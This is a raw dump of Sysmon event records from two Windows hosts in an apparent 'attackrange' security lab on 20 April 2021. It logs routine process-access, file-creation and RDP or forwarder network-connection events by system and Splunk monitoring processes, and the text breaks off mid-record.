14:56:58.426{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050172Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:58.426{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050171Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:58.426{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050170Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:58.426{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050169Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:58.426{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050168Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:58.426{85C0FFC9-B7EC-607E-0500-00000000BB01}416532C:\Windows\system32\csrss.exe{85C0FFC9-EBBA-607E-E706-00000000BB01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000050167Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:58.426{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EBBA-607E-E706-00000000BB01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000050166Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:58.426{85C0FFC9-EBBA-607E-E706-00000000BB01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000050165Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:58.223{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8F3D3BDE8DF8A0B3F91A4D325B46BC9,SHA256=E85A3437023DB74B5D84FE7837AC0B29DDA00F07CE9097999A2FCAAA95B0E093,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050164Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:58.223{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8F829AB45503D100EADF0FDA77B7A805,SHA256=D52C668093DD8DD6ED74EE74017569550E54772A9DAEC9FFE856E67A17765D5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073344Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:59.921{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073343Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:58.335{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-2541-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000073342Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:59.562{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073341Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:59.343{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1D9E610F6B1E91C9A89FBECCD84B912,SHA256=469B59491F86DAEDC8427DA4DDB2404DADF82996CC0F6F226AAD047BA71DB90F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000073340Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:59.124{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EBBB-607E-A80B-00000000BB01}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073339Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:59.124{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073338Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:59.124{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073337Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:59.124{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073336Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:59.124{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073335Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:59.124{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBBB-607E-A80B-00000000BB01}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073334Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:59.124{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EBBB-607E-A80B-00000000BB01}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000073333Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:59.127{A7A01FEF-EBBB-607E-A80B-00000000BB01}3376C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000073332Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:59.093{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=7F6E899100EEE02EED16AE2508C92C43,SHA256=5FCC68040B051A700175667EF12100C94243404530570334313E63AD075FCA13,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050183Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:59.629{85C0FFC9-B7ED-607E-1100-00000000BB01}1000NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=9A19CD1687FB5CFC8C155D9CA613841E,SHA256=2771E7F06952A2473BF044BEE7CF8F73A80474ABDF2300B0A1B1D72478DECFB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050182Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:59.441{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5C40AA428510270D4E35652F7D77533A,SHA256=0E72599C7AF1E1E30107EF47958AE09902282DCCC90E57CE8982DB61B12556E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050181Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:56.236{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64101-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050180Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:56:59.254{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C5A3FDCC1F9DFDBB1D6715F876207FF,SHA256=439FCCB2FD14E322A0C4F4D0EC979B1255EA7922F35319ED74E024C3C6B43116,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000073349Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:56:58.817{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57527-false10.0.1.12-8089- 23542300x800000000000000073348Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:00.624{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A385D8825C65DD4D36CC7698CCB18E39,SHA256=F79A8280915EACF4D9630071712243796835D86BFA9CD9B6A07451F980891B89,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073347Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:00.327{A7A01FEF-EB7F-607E-9C0B-00000000BB01}1400NT AUTHORITY\SYSTEMC:\Windows\system32\msiexec.exeC:\Windows\assembly\PublisherPolicy.tmeMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073346Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:00.140{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=84091EEB941EEFE81FCB287C0090A4F7,SHA256=38EDFCC1F2A3B0D99569C28373585F3AA30ABAFE38C38338741DDA0E08294264,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000073345Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:00.109{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=DEDC481D1CA93700678A347E289FD64D,SHA256=E988C6221E4F56A19BDDA435783A09AFB286B00315271394E319F1086BFD9D21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050197Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:00.254{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE314F9C0BDCE7F94410EB4B94A56C50,SHA256=C239D3CF54DA2F448AF10664A7820F46947BD613BBFF5711F7C005E65DC55D8B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000050196Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:00.160{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EBBC-607E-E806-00000000BB01}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050195Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:00.160{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050194Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:57:00.160{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000050193Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 